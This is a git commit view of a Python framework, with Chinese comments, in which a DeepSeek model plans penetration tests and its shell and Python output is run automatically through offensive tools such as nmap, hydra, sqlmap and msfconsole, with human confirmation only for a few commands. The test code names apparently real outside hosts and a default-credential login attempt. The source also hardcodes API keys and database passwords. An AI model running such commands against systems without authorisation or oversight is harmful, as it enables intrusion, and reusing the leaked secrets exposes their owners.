Browse Source

初始版本0.1

master
张龙 2 months ago
commit
392022633a
  1. 8
      .idea/.gitignore
  2. 36
      .idea/deployment.xml
  3. 103
      .idea/inspectionProfiles/Project_Default.xml
  4. 6
      .idea/inspectionProfiles/profiles_settings.xml
  5. 4
      .idea/misc.xml
  6. 8
      .idea/modules.xml
  7. 6
      .idea/vcs.xml
  8. 8
      .idea/zf_safe.iml
  9. 6
      DBManager.py
  10. 86
      InstructionManager.py
  11. 173
      LLMManager.py
  12. 60
      QQ_DS_API.py
  13. 59
      TargetManager.py
  14. 252
      TaskManager.py
  15. 26
      config.yaml
  16. 52
      main.py
  17. 238
      mycode/DBManager.py
  18. 8
      mycode/LLMBase.py
  19. 56
      myutils/ConfigManager.py
  20. 31
      myutils/FileManager.py
  21. 33
      myutils/MyDeque.py
  22. 73
      myutils/MyLogger_logger.py
  23. 12
      myutils/MyTime.py
  24. 67
      myutils/ReManager.py
  25. 32
      myutils/ReturnParams.py
  26. 0
      payload/mails
  27. 50
      payload/passwords
  28. 154
      payload/smuggler-master/.gitignore
  29. 21
      payload/smuggler-master/LICENSE
  30. 139
      payload/smuggler-master/README.md
  31. 31
      payload/smuggler-master/configs/default.py
  32. 27
      payload/smuggler-master/configs/doubles.py
  33. 52
      payload/smuggler-master/configs/exhaustive.py
  34. 3
      payload/smuggler-master/payloads/README.md
  35. 445
      payload/smuggler-master/smuggler.py
  36. 3
      payload/users
  37. 15
      pipfile
  38. 30
      res
  39. 1
      test
  40. 86
      test.py
  41. 286
      tools/CurlTool.py
  42. 19
      tools/DigTool.py
  43. 21
      tools/EchoTool.py
  44. 83
      tools/FtpTool.py
  45. 61
      tools/GobusterTool.py
  46. 31
      tools/Hping3Tool.py
  47. 38
      tools/HydraTool.py
  48. 15
      tools/KubehunterTool.py
  49. 174
      tools/MsfconsoleTool.py
  50. 64
      tools/MysqlTool.py
  51. 13
      tools/NcTool.py
  52. 22
      tools/NiktoTool.py
  53. 69
      tools/NmapTool.py
  54. 14
      tools/NslookupTool.py
  55. 67
      tools/OpensslTool.py
  56. 80
      tools/PythonTool.py
  57. 29
      tools/SearchsploitTool.py
  58. 30
      tools/SmtpuserenumTool.py
  59. 18
      tools/SmugglerTool.py
  60. 41
      tools/SqlmapTool.py
  61. 12
      tools/SshTool.py
  62. 11
      tools/SslscanTool.py
  63. 13
      tools/Sublist3rTool.py
  64. 135
      tools/TelnetTool.py
  65. 142
      tools/ToolBase.py
  66. 11
      tools/WhatwebTool.py
  67. 21
      tools/WhoisTool.py
  68. 50
      tools/__RequestTool.py
  69. 0
      tools/__TorsocksTool.py

8
.idea/.gitignore

@ -0,0 +1,8 @@
# Default ignored files
/shelf/
/workspace.xml
# Datasource local storage ignored files
/../../../../../:\Project\pyProject\zf_safe\.idea/dataSources/
/dataSources.local.xml
# Editor-based HTTP Client requests
/httpRequests/

36
.idea/deployment.xml

@ -0,0 +1,36 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="PublishConfigData" autoUpload="Always" serverName="root@192.168.204.136:22 password" remoteFilesAllowedToDisappearOnAutoupload="false">
<serverData>
<paths name="root@192.168.204.136:22 password">
<serverdata>
<mappings>
<mapping deploy="/mnt/zfsafe" local="$PROJECT_DIR$" />
</mappings>
</serverdata>
</paths>
<paths name="root@192.168.3.104:22">
<serverdata>
<mappings>
<mapping local="$PROJECT_DIR$" web="/" />
</mappings>
</serverdata>
</paths>
<paths name="root@192.168.3.48:22">
<serverdata>
<mappings>
<mapping local="$PROJECT_DIR$" web="/" />
</mappings>
</serverdata>
</paths>
<paths name="root@199.115.230.23:26004">
<serverdata>
<mappings>
<mapping local="$PROJECT_DIR$" web="/" />
</mappings>
</serverdata>
</paths>
</serverData>
<option name="myAutoUpload" value="ALWAYS" />
</component>
</project>

103
.idea/inspectionProfiles/Project_Default.xml

@ -0,0 +1,103 @@
<component name="InspectionProjectProfileManager">
<profile version="1.0">
<option name="myName" value="Project Default" />
<inspection_tool class="PyPackageRequirementsInspection" enabled="true" level="WARNING" enabled_by_default="true">
<option name="ignoredPackages">
<value>
<list size="90">
<item index="0" class="java.lang.String" itemvalue="requests" />
<item index="1" class="java.lang.String" itemvalue="google-pasta" />
<item index="2" class="java.lang.String" itemvalue="protobuf" />
<item index="3" class="java.lang.String" itemvalue="opt-einsum" />
<item index="4" class="java.lang.String" itemvalue="yarg" />
<item index="5" class="java.lang.String" itemvalue="python-dotenv" />
<item index="6" class="java.lang.String" itemvalue="QtPy" />
<item index="7" class="java.lang.String" itemvalue="setuptools" />
<item index="8" class="java.lang.String" itemvalue="gast" />
<item index="9" class="java.lang.String" itemvalue="gitdb" />
<item index="10" class="java.lang.String" itemvalue="torchvision" />
<item index="11" class="java.lang.String" itemvalue="markdown-it-py" />
<item index="12" class="java.lang.String" itemvalue="redis" />
<item index="13" class="java.lang.String" itemvalue="dominate" />
<item index="14" class="java.lang.String" itemvalue="mkl" />
<item index="15" class="java.lang.String" itemvalue="python-magic" />
<item index="16" class="java.lang.String" itemvalue="docopt" />
<item index="17" class="java.lang.String" itemvalue="Pygments" />
<item index="18" class="java.lang.String" itemvalue="PyQt5" />
<item index="19" class="java.lang.String" itemvalue="certifi" />
<item index="20" class="java.lang.String" itemvalue="astunparse" />
<item index="21" class="java.lang.String" itemvalue="keras" />
<item index="22" class="java.lang.String" itemvalue="pyreadline3" />
<item index="23" class="java.lang.String" itemvalue="Markdown" />
<item index="24" class="java.lang.String" itemvalue="libclang" />
<item index="25" class="java.lang.String" itemvalue="GitPython" />
<item index="26" class="java.lang.String" itemvalue="pydantic" />
<item index="27" class="java.lang.String" itemvalue="tifffile" />
<item index="28" class="java.lang.String" itemvalue="h5py" />
<item index="29" class="java.lang.String" itemvalue="python-engineio" />
<item index="30" class="java.lang.String" itemvalue="tensorboard-data-server" />
<item index="31" class="java.lang.String" itemvalue="wrapt" />
<item index="32" class="java.lang.String" itemvalue="cryptography" />
<item index="33" class="java.lang.String" itemvalue="coloredlogs" />
<item index="34" class="java.lang.String" itemvalue="tensorflow-intel" />
<item index="35" class="java.lang.String" itemvalue="python-socketio" />
<item index="36" class="java.lang.String" itemvalue="flatbuffers" />
<item index="37" class="java.lang.String" itemvalue="natsort" />
<item index="38" class="java.lang.String" itemvalue="tensorboard" />
<item index="39" class="java.lang.String" itemvalue="imageio" />
<item index="40" class="java.lang.String" itemvalue="av" />
<item index="41" class="java.lang.String" itemvalue="optree" />
<item index="42" class="java.lang.String" itemvalue="tbb" />
<item index="43" class="java.lang.String" itemvalue="labelme" />
<item index="44" class="java.lang.String" itemvalue="charset-normalizer" />
<item index="45" class="java.lang.String" itemvalue="Flask-SocketIO" />
<item index="46" class="java.lang.String" itemvalue="aiortc" />
<item index="47" class="java.lang.String" itemvalue="visitor" />
<item index="48" class="java.lang.String" itemvalue="idna" />
<item index="49" class="java.lang.String" itemvalue="mkl-service" />
<item index="50" class="java.lang.String" itemvalue="scikit-image" />
<item index="51" class="java.lang.String" itemvalue="Hypercorn" />
<item index="52" class="java.lang.String" itemvalue="simple-websocket" />
<item index="53" class="java.lang.String" itemvalue="smmap" />
<item index="54" class="java.lang.String" itemvalue="pybboxes" />
<item index="55" class="java.lang.String" itemvalue="py-cpuinfo" />
<item index="56" class="java.lang.String" itemvalue="bidict" />
<item index="57" class="java.lang.String" itemvalue="opencv-python-headless" />
<item index="58" class="java.lang.String" itemvalue="sniffio" />
<item index="59" class="java.lang.String" itemvalue="Flask-Bootstrap" />
<item index="60" class="java.lang.String" itemvalue="exceptiongroup" />
<item index="61" class="java.lang.String" itemvalue="onnxruntime" />
<item index="62" class="java.lang.String" itemvalue="tensorflow" />
<item index="63" class="java.lang.String" itemvalue="win32-setctime" />
<item index="64" class="java.lang.String" itemvalue="gdown" />
<item index="65" class="java.lang.String" itemvalue="seaborn" />
<item index="66" class="java.lang.String" itemvalue="mdurl" />
<item index="67" class="java.lang.String" itemvalue="imgviz" />
<item index="68" class="java.lang.String" itemvalue="ml-dtypes" />
<item index="69" class="java.lang.String" itemvalue="urllib3" />
<item index="70" class="java.lang.String" itemvalue="lazy_loader" />
<item index="71" class="java.lang.String" itemvalue="scipy" />
<item index="72" class="java.lang.String" itemvalue="thop" />
<item index="73" class="java.lang.String" itemvalue="opencv-python" />
<item index="74" class="java.lang.String" itemvalue="wheel" />
<item index="75" class="java.lang.String" itemvalue="intel-openmp" />
<item index="76" class="java.lang.String" itemvalue="tzdata" />
<item index="77" class="java.lang.String" itemvalue="rich" />
<item index="78" class="java.lang.String" itemvalue="pipreqs" />
<item index="79" class="java.lang.String" itemvalue="torch" />
<item index="80" class="java.lang.String" itemvalue="humanfriendly" />
<item index="81" class="java.lang.String" itemvalue="ultralytics" />
<item index="82" class="java.lang.String" itemvalue="pandas" />
<item index="83" class="java.lang.String" itemvalue="tqdm" />
<item index="84" class="java.lang.String" itemvalue="termcolor" />
<item index="85" class="java.lang.String" itemvalue="colorama" />
<item index="86" class="java.lang.String" itemvalue="namex" />
<item index="87" class="java.lang.String" itemvalue="grpcio" />
<item index="88" class="java.lang.String" itemvalue="pytz" />
<item index="89" class="java.lang.String" itemvalue="terminaltables" />
</list>
</value>
</option>
</inspection_tool>
</profile>
</component>

6
.idea/inspectionProfiles/profiles_settings.xml

@ -0,0 +1,6 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

4
.idea/misc.xml

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectRootManager" version="2" project-jdk-name="Remote Python 3.12.9 (sftp://root@192.168.204.136:22/usr/bin/python)" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/zf_safe.iml" filepath="$PROJECT_DIR$/.idea/zf_safe.iml" />
</modules>
</component>
</project>

6
.idea/vcs.xml

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$" vcs="Git" />
</component>
</project>

8
.idea/zf_safe.iml

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$" />
<orderEntry type="jdk" jdkName="Remote Python 3.12.9 (sftp://root@192.168.204.136:22/usr/bin/python)" jdkType="Python SDK" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
</module>

6
DBManager.py

@ -0,0 +1,6 @@
'''
数据库管理功能类
'''
class DBManager:
def __init__(self):
pass

86
InstructionManager.py

@ -0,0 +1,86 @@
'''
对LLM回复的指令进行管理过滤判重等
1.curl--保存到待用户确认类
2.nmap 执行若是增加端口要考虑是否有效
负责指令的执行和针对执行子进程的管理
1.suprocess 执行指令对返回结果进行提炼
2.实时显示suprocess的状态可以人工干预停止
'''
import subprocess
import importlib
import os
from tools.ToolBase import ToolBase
class InstructionManager:
def __init__(self):
self.tool_registry = {} #安全工具list
self.load_tools() #加载工具类
def init_data(self):
pass
# 动态加载工具类
def load_tools(self):
tools_dir = "tools"
if not os.path.exists(tools_dir):
os.makedirs(tools_dir)
return
for filename in os.listdir(tools_dir):
if filename.endswith(".py") and not filename.startswith("__"):
module_name = filename[:-3]
try:
module = importlib.import_module(f"{tools_dir}.{module_name}")
cls = getattr(module,module_name)
if(issubclass(cls, ToolBase) and cls != ToolBase):
tool_name = module_name.lower()[:-4]
self.tool_registry[tool_name] = cls()
except ImportError as e:
print(f"加载工具 {module_name} 失败:{str(e)}")
# 执行指令
def execute_instruction(self,instruction):
bres = False
instr = None
result = None
source_result = None
ext_params = None
tool_name_tmp = instruction.split()[0] # 提取工具名称
tool_name = tool_name_tmp.replace("-","")
# 检查是否存在对应工具
if tool_name in self.tool_registry:
tool = self.tool_registry[tool_name]
print(f"*****开始执行指令:{instruction}")
bres,instr, result,source_result,ext_params = tool.execute_instruction(instruction)
#print(f"分析结果:{result}")
print(f"*****指令:{instr},执行完毕")
else:
instr = instruction #保障后续代码的一致性
print(f"执行指令:{instr}")
print(f"未知工具:{tool_name}")
return bres,instr,result,source_result,ext_params
#过来指令:合规、判重、待执行等
def _instruction_filter(self,instruction):
pass
#根据指令执行结果,重新构建提示词
def _fetch_prompt(self):
pass
if __name__ == "__main__":
instrM = InstructionManager()
instrS = ['whois haitutech.cn',
'dig haitutech.cn ANY +noall +answer',
'nslookup -query=MX haitutech.cn',
'sublist3r -d haitutech.cn -o subdomains.txt',
'amass enum -d haitutech.cn',
'nmap -sV -p- -T4 --min-rate 1000 haitutech.cn -oN nmap_scan.txt'
]
for instr in instrS:
bres,instr,reslut =instrM.execute_instruction(instr)

173
LLMManager.py

@ -0,0 +1,173 @@
'''
实现对大模型调用的封装隔离具体使用的LLM
pip install openai
'''
import openai
import json
import threading
import re
from openai import OpenAI
from myutils.MyTime import get_local_timestr
class LLMManager:
def __init__(self,illm_type=0):
self.api_key = None
self.api_url = None
self.task_id =0 #一个任务一个id
self.llm_sn = 0 # llm执行序列号,--一任务一序列
self.llm_sn_lock = threading.Lock() #
#temperature设置
#DS------代码生成/数学解题:0.0 -- 数据抽取/分析:1.0 -- 通用对话:1.3 -- 翻译:1.3 -- 创意类写作:1.5
#腾讯云---
self.temperature = 1.0
if illm_type == 0: #腾讯云
self.api_key = "fGBYaQLHykBOQsFwVrQdIFTsYr8YDtDVDQWFU41mFsmvfNPc"
self.api_url = ""
elif illm_type == 1: #DS
self.api_key ="sk-10360148b465424288218f02c87b0e1b"
self.api_url ="https://api.deepseek.com/v1"
self.model = "deepseek-reasoner" #model=deepseek-reasoner -- R1 model=deepseek-chat --V3
#创建会话对象 -- 一个任务的LLM必须唯一
self.client = OpenAI(api_key=self.api_key,base_url=self.api_url)
self.messages = []
# 初始化阶段和已知信息
current_stage = "信息收集"
known_info = {"url": "www.test.com"}
results = [] # 存储所有任务结果,用于生成报告
#******测试使用,设置slef.message的值
def test_old_message(self,strMessage):
try:
self.messages = json.loads(strMessage)
except json.JSONDecodeError as e:
print(f"JSON解析错误: {str(e)}")
except Exception as e:
print(f"错误: {str(e)}")
# 构建初始提示 初始化messages
def build_initial_prompt(self,target,know_info=""):
self.messages = [{"role": "system",
"content": "你是一位资深的渗透测试专家,需要动态控制整个渗透测试过程,包括信息收集、漏洞扫描、漏洞利用等阶段,最终生成渗透测试报告。由你规划执行的指令,我会根据你的指令执行并提交结果,你再对结果进行分析,规划并生成下一步指令,直到完成渗透测试,生成测试报告。"
"生成的指令需满足如下约束:"
"1.只返回具体的shell指令或Python代码,不要包含注释和说明;"
"2.shell指令以```bash(.*?)```包裹,python代码以```python(.*?)```包裹;"
"3.针对提供的Python代码,需要包含错误处理,并将执行结果保存到文件中(为每个任务指定唯一文件名),执行结束返回success或failure和该文件名;"
"4.如果认为渗透测试已完成,请生成生成报告的python代码,并返回success和complete"}] # 一个messages
return f"现在开始对目标{target}进行渗透测试,已知信息{know_info},请提供下一步执行的指令。"
# 构建反馈提示
def build_feedback_prompt(self,bres,instruction, result):
if bres:
return f"执行指令“{instruction}”的结果是“{result}”。请根据这些结果生成下一步具体的指令。"
else:
return ""
def init_data(self,task_id=0):
#初始化LLM数据
self.llm_sn = 0
self.task_id = task_id
self.messages = []
# 调用LLM生成指令
def get_llm_instruction(self,prompt,th_DBM):
'''
1.由于大模型API不记录用户请求的上下文一个任务的LLM不能并发
:param prompt:用户本次输入的内容
:return: instr_list
'''
#添加本次输入入队列
message = {"role":"user","content":prompt}
self.messages.append(message)
#提交LLM
post_time = get_local_timestr()
response = self.client.chat.completions.create(
model=self.model,
messages = self.messages
)
reasoning_content = ""
content = ""
#LLM返回处理
if self.model == "deepseek-reasoner":
#返回错误码:DS-https://api-docs.deepseek.com/zh-cn/quick_start/error_codes
reasoning_content = response.choices[0].message.reasoning_content #推理过程
print(reasoning_content)
content = response.choices[0].message.content #推理内容
print(content)
#记录历史信息
self.messages.append({'role': 'assistant', 'content': content})
elif self.model == "deepseek-chat":
content = response.choices[0].message
#记录历史信息
self.messages.append(content)
#LLM记录存数据库
with self.llm_sn_lock:
self.llm_sn += 1
#llm查询记录入库
bres = th_DBM.insert_llm(self.task_id,prompt,reasoning_content,content,post_time,self.llm_sn)
if not bres:
print("llm入库失败!")
#********测试时使用---输出和记录LLM返回指令的message
print(f"Messages:{self.messages}")
with open("test","w",encoding="utf-8") as f: #输出到文件
json.dump(self.messages,f,ensure_ascii=False)
#需要对指令进行提取
instr_list = self.fetch_instruction(content)
return instr_list
def fetch_instruction(self,response_text):
'''
提取命令列表包括
1. Python 代码块仅保留有效 Python 代码
2. Shell 命令分割空行每个块视为一条指令
:param text: 输入文本
:return: 解析后的命令列表
'''
#针对llm的回复,提取执行的指令
# 正则匹配 Python 代码块
python_blocks = re.findall(r"```python(.*?)```", response_text, flags=re.DOTALL)
# 处理 Python 代码块,去除空行并格式化
python_blocks = [block.strip() for block in python_blocks]
# 按连续的空行拆分
# 移除 Python 代码块,但保留内容用于返回
text_no_python = re.sub(r"```python.*?```", "PYTHON_BLOCK", response_text, flags=re.DOTALL)
# 这里用 \n\s*\n 匹配一个或多个空白行
parts = re.split(r'\n\s*\n', text_no_python)
commands = []
python_index = 0 # 记录 Python 代码块插入位置
for part in parts:
part = part.strip()
if not part:
continue
if "PYTHON_BLOCK" in part:
# 还原 Python 代码块
commands.append(f"python {python_blocks[python_index]}")
python_index += 1
else:
# 添加普通 Shell 命令
commands.append(part)
return commands
def test_llm(self):
with open("test", "r", encoding="utf-8") as f:
messages = json.load(f)
text = messages[-1]["content"]
list = self.fetch_instruction(text)
for itme in list:
print("***********")
print(itme)
if __name__ == "__main__":
LM = LLMManager(1)
LM.test_llm()

60
QQ_DS_API.py

@ -0,0 +1,60 @@
from openai import OpenAI
import os
# 初始化OpenAI客户端
client = OpenAI(
# 请用知识引擎原子能力API Key将下行替换为:api_key="sk-xxx",
api_key="sk-fGBYaQLHykBOQsFwVrQdIFTsYr8YDtDVDQWFU41mFsmvfNPc", # 如何获取API Key:https://cloud.tencent.com/document/product/1772/115970
base_url="https://api.lkeap.cloud.tencent.com/v1",
)
def main():
reasoning_content = "" # 定义完整思考过程
answer_content = "" # 定义完整回复
is_answering = False # 判断是否结束思考过程并开始回复
# 创建聊天完成请求
stream = client.chat.completions.create(
model="deepseek-v3", # 此处以 deepseek-v3 为例,可按需更换模型名称
messages=[
{"role": "user", "content": "9.9和9.11谁大"}
],
stream=True
)
print("\n" + "=" * 20 + "思考过程" + "=" * 20 + "\n")
for chunk in stream:
# 处理usage信息
if not getattr(chunk, 'choices', None):
print("\n" + "=" * 20 + "Token 使用情况" + "=" * 20 + "\n")
print(chunk.usage)
continue
delta = chunk.choices[0].delta
# 处理空内容情况
if not getattr(delta, 'reasoning_content', None) and not getattr(delta, 'content', None):
continue
# 处理开始回答的情况
if not getattr(delta, 'reasoning_content', None) and not is_answering:
print("\n" + "=" * 20 + "完整回复" + "=" * 20 + "\n")
is_answering = True
# 处理思考过程
if getattr(delta, 'reasoning_content', None):
print(delta.reasoning_content, end='', flush=True)
reasoning_content += delta.reasoning_content
# 处理回复内容
elif getattr(delta, 'content', None):
print(delta.content, end='', flush=True)
answer_content += delta.content
if __name__ == "__main__":
try:
main()
except Exception as e:
print(f"发生错误:{e}")

59
TargetManager.py

@ -0,0 +1,59 @@
'''
对目标资产的管理包括信息的更新维护等
'''
import re
#pattern = r'^(https?://)?((?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}|(?:\d{1,3}\.){3}\d{1,3})(:\d+)?(/.*)?$'
pattern = r'^(https?://)?((?:[0-9]{1,3}\.){3}[0-9]{1,3}|(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,})(:\d+)?(/.*)?$'
class TargetManager:
def __init__(self):
pass
# 辅助函数:验证IPv4地址的有效性
def _is_valid_ipv4(self,ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
return False
return True
#验证目标格式的合法性,并提取域名或IP
def validate_and_extract(self,input_str):
'''
:param input_str:
:return: bool,str,int(1-IP,2-domain)
'''
regex_match = re.fullmatch(pattern, input_str)
type = None
if regex_match:
domain_or_ip = regex_match.group(2)
# 仅对 IPv4 格式的字符串进行有效性验证
if re.fullmatch(r'\d{1,3}(\.\d{1,3}){3}', domain_or_ip):
if not self._is_valid_ipv4(domain_or_ip):
return False, None,type
else:
type = 1 #IP
else:
type = 2 #domain
return True, domain_or_ip,type
else:
return False, None,type
if __name__ == "__main__":
tm = TargetManager()
# 示例测试
test_cases = [
"http://192.168.1.1:8080/path",
"https://example.com",
"192.168.1.1:80",
"example.com/path/to/resource",
"ftp://invalid.com", # 不合规
"http://300.400.500.600" # 不合规
]
for case in test_cases:
is_valid, result = tm.validate_and_extract(case)
print(f"输入: '{case}' → 合规: {is_valid}, 提取结果: {result}")

252
TaskManager.py

@ -0,0 +1,252 @@
'''
渗透测试任务管理类 一次任务的闭合性要检查2025-3-10 一次任务后要清理LLM和InstrM的数据
'''
from TargetManager import TargetManager # 从模块导入类
from LLMManager import LLMManager # 同理修正其他导入
from myutils.FileManager import FileManager
from InstructionManager import InstructionManager
from mycode.DBManager import DBManager
from myutils.MyTime import get_local_timestr
import queue
import time
import os
import threading
class TaskManager:
def __init__(self):
self.TargetM = TargetManager()
# 生成功能对象
self.LLMM = LLMManager(1)
self.InstrM = InstructionManager()
self.DBM = DBManager() #主进程一个DBM
self.DBM.connect()
# 控制最大并发指令数量
self.max_thread_num = 2
self.task_id = 0 #任务id --
self.do_sn = 0 #指令执行顺序号--暂时已执行完成顺序记录
self.workth_list = [] #线程句柄list
self.batch_num = 0 #一个批次的指令数量
self.long_instr_num = 0 #耗时指令数量
self.long_time_instr = ['nikto'] #耗时操作不计入批量执行的数量,不加不减
self.instr_queue = queue.Queue() #线程安全 --待执行指令
self.user_instr = queue.Queue() #需要用确认或手动执行的命令--待执行指令
self.user_done_instr = queue.Queue() #执行完成需要用户确认的指令
self.doing_instr = queue.Queue()#执行中的指令
self.done_instr = queue.Queue() #执行完成的指令
self.res_queue = queue.Queue() #结果队列
self.lock = threading.Lock() #线程锁
self.do_sn_lock = threading.Lock() #指令执行顺序号锁
self.brun = True
def is_user_instr(self,instr):
'''
过滤需要人工确认或手动执行的指令 ---- 待完善
:param instr:
:return:
'''
#if instr.startswith("curl") or instr.startswith("http") or instr.startswith("wget"):
if instr.startswith("http") or instr.startswith("wget") or instr.startswith("ssh"):
return True
def instr_in_quere(self,instr_list):
'''
对于运行需要较长时间的不强求同一批次返回给LLM
:param instr_list:
:return:
'''
for instr in instr_list:
if self.is_user_instr(instr):
self.user_instr.put(instr)
print(f"需要人工确认的指令{instr}")
else:
matched =False
for prefix in self.long_time_instr:
if instr.startswith(prefix):
matched =True
if not matched:
with self.lock:
self.batch_num += 1 #非耗时指令+1
print(f"&&&&&&当前batch_num:{self.batch_num}")
else:
with self.lock:
self.long_instr_num +=1 #耗时指令数量+1
# 指令入队列
self.instr_queue.put(instr)
#入数据库放哪一层要待定-TaskManager , InstructionM,ToolBase-2025-3-10
def res_in_db(self,bres,instr,reslut,start_time,end_time,th_DBM,source_result,ext_params):
if th_DBM.ok:
with self.do_sn_lock:
self.do_sn += 1 #指令的执行序列是一个任务共用,要线程锁,错误问题也不大
th_DBM.insetr_result(self.task_id,instr,reslut,self.do_sn,start_time,end_time,source_result,ext_params)
else:
print("数据库连接失败!!")
def res_in_quere(self,bres,instr,reslut,start_time,end_time,th_DBM,source_result,ext_params):
'''
执行结果入队列若批量执行的指令都完成则提交LLM生成下一步指令
:param bres:
:param instr:
:param reslut:
:return:
'''
matched = False
bover = False
#入数据库 -- bres True和False 都入数据库2025-3-10
self.res_in_db(bres,instr,reslut,start_time,end_time,th_DBM,source_result,ext_params)
#结果入队列
if bres:
res = {'instr':instr,'reslut':reslut}
self.res_queue.put(res) #入队列
else: #对于不需要再提交给LLM的结果,如何处理待定。有执行false、未知工具
pass
#判断批次指令是否都执行完
for prefix in self.long_time_instr:
if instr.startswith(prefix):
matched = True
if not matched:
with self.lock:
self.batch_num -= 1 #非耗时指令-1
print(f"&&&&&&当前batch_num:{self.batch_num}")
if self.batch_num ==0: #只会轮询到最后一个线程才会是0
bover = True
else:
#这里会有个问题,若耗时指令执行完,结果入队列后,但LLM没有进一步的指令下发,会造成结果不会提交
#需要在生成“生成报告”的指令时进行研判--该点很重要
with self.lock:
self.long_instr_num -=1 #耗时指令数量-1
if bover:
#整合结果提交 -- 需要确保只有一个线程会执行
self.batch_res_post(th_DBM)
def batch_res_post(self,th_DBM):
'''
组合批量指令的结果一起提交到LLM生成下一步具体指令
:return:
'''
post_string = ""
while not self.res_queue.empty():
res = self.res_queue.get()
str = f"执行指令:{res['instr']}的结果是:{res['reslut']}"
post_string = post_string + "\n"
post_string = post_string + str
if post_string:
post_string = post_string + "\n请根据这些结果生成下一步具体的指令。"
print(f"***************\n{post_string}")
with open("res","w",encoding="utf-8") as f:
f.write(post_string)
#*****测试时中断下一步指令的获取
# 提交提示词,得到下一步指令
# instr_list = self.LLMM.get_llm_instruction(post_string,th_DBM)
# if instr_list:
# if instr_list[0] == "生成报告": #“生成报告”要特殊处理#?
# self.brun = False
# print("生成报告--退出工作线程")
# else: # 继续工作
# self.instr_in_quere(instr_list)
def do_worker_th(self):
#线程的dbm需要一个线程一个
th_DBM = DBManager()
th_DBM.connect()
while self.brun:
try:
instruction = self.instr_queue.get(block=False) #quere线程安全,block=false非阻塞get
self.doing_instr.put(instruction) #入执行队列
#执行中会对指令进行微调,并有可能不执行直接返回空结果
start_time = get_local_timestr() #指令执行开始时间
bres,instr,reslut,source_result,ext_params = self.InstrM.execute_instruction(instruction)
end_time = get_local_timestr() #指令执行结束时间
self.res_in_quere(bres,instr,reslut,start_time,end_time,th_DBM,source_result,ext_params) #执行结果入队列
self.done_instr.put(instruction) #执行完成队列
#执行情况是否需要用户确认
if ext_params["is_user"]:
pass
#print("该指令执行需要用户确认")
except queue.Empty:
time.sleep(10)
#函数结束,局部变量自动释放
def start_task(self,target_name,target_in):
#判断目标合法性
bok,target,type = self.TargetM.validate_and_extract(target_in)
if bok:
self.target = target
self.type = type #1-IP,2-domain
self.task_id = self.DBM.start_task(target_name,target_in) #数据库新增任务记录
#获取基本信息: 读取数据库或预生成指令,获取基本的已知信息
know_info = "" #?
#启动--初始化指令
prompt = self.LLMM.build_initial_prompt(target,know_info)
instr_list = self.LLMM.get_llm_instruction(prompt,self.DBM)
self.instr_in_quere(instr_list) #指令入队列
#创建工作线程
for i in range(self.max_thread_num):
w_th = threading.Thread(target=self.do_worker_th)
w_th.start()
self.workth_list.append(w_th)
#等待线程结束--执行生成报告
for t in self.workth_list:
t.join()
#生成报告
pass
else:
return False,"{target}检测目标不合规,请检查!"
def stop_task(self):
self.brun = False
self.LLMM.init_data() #清空一些全局变量
self.InstrM.init_data()
#结束任务需要收尾处理#?
if __name__ == "__main__":
import json
TM = TaskManager()
FM = FileManager()
current_path = os.path.dirname(os.path.realpath(__file__))
strMsg = FM.read_file("test",1)
TM.LLMM.test_old_message(strMsg) #先设置message的值
test_type = 3
if test_type == 1:
#测试执行指令
# instrS = ['gobuster dir -u https://58.216.217.70 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 20 --timeout 10s',
# 'searchsploit SoftEther VPN',
# 'curl -kv -X POST -d "username=admin&password=admin" https://58.216.217.70/vpn/index.html --connect-timeout 10',
# 'gobuster dir -u http://58.216.217.70:10001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 --timeout 10s']
#instrS = ['nmap -sV -sC -p- -Pn 192.168.204.137']
with open("test", "r", encoding="utf-8") as f:
messages = json.load(f)
text = messages[-1]["content"]
#list = TM.LLMM.fetch_instruction(text)[9:10]
list = TM.LLMM.fetch_instruction(text)
#print(list)
TM.instr_in_quere(list)
#创建线程执行指令
for i in range(TM.max_thread_num):
w_th = threading.Thread(target=TM.do_worker_th)
w_th.start()
TM.workth_list.append(w_th)
# 等待线程结束--执行生成报告
for t in TM.workth_list:
t.join()
elif test_type ==2:
#测试LLM返回下一步指令
with open("res", "r", encoding="utf-8") as f:
prompt = f.read()
if prompt:
instr_list = TM.LLMM.get_llm_instruction(prompt,TM.DBM)
TM.instr_in_quere(instr_list) # 指令入队列问题不大,任务执行线程没有起
elif test_type ==3: #新目标测试
prompt = TM.LLMM.build_initial_prompt("192.168.204.137","")
if prompt:
instr_list = TM.LLMM.get_llm_instruction(prompt,TM.DBM)
TM.instr_in_quere(instr_list) # 指令入队列问题不大,任务执行线程没有起
else:
#完整过程测试---要设定终止条件
pass

26
config.yaml

@ -0,0 +1,26 @@
#日志记录
file_log_level: INFO #是否记录日志
show_log_level: DEBUG #日志记录级别
log_dir: logs
#远程数据库 --- 香橙派用不了
DBType: 0 #0--mysql,1--sqlite
mysql:
host: 127.0.0.1
port: 3306
user: root
passwd: anan2013@BABY
database: zfsafe
#sqlit
sqlite: zfbox.db
#用户初始密码
pw: zfkj_123!@#
#服务器端socket
serverIP: 192.168.3.190
serverPort: 18010
DevID: 12345678901234567890123456789012
sockettimeout: 600 #10分钟

52
main.py

@ -0,0 +1,52 @@
# This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your mycode.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import os
from openai import OpenAI
import TaskManager
def LLMtest():
client = OpenAI(
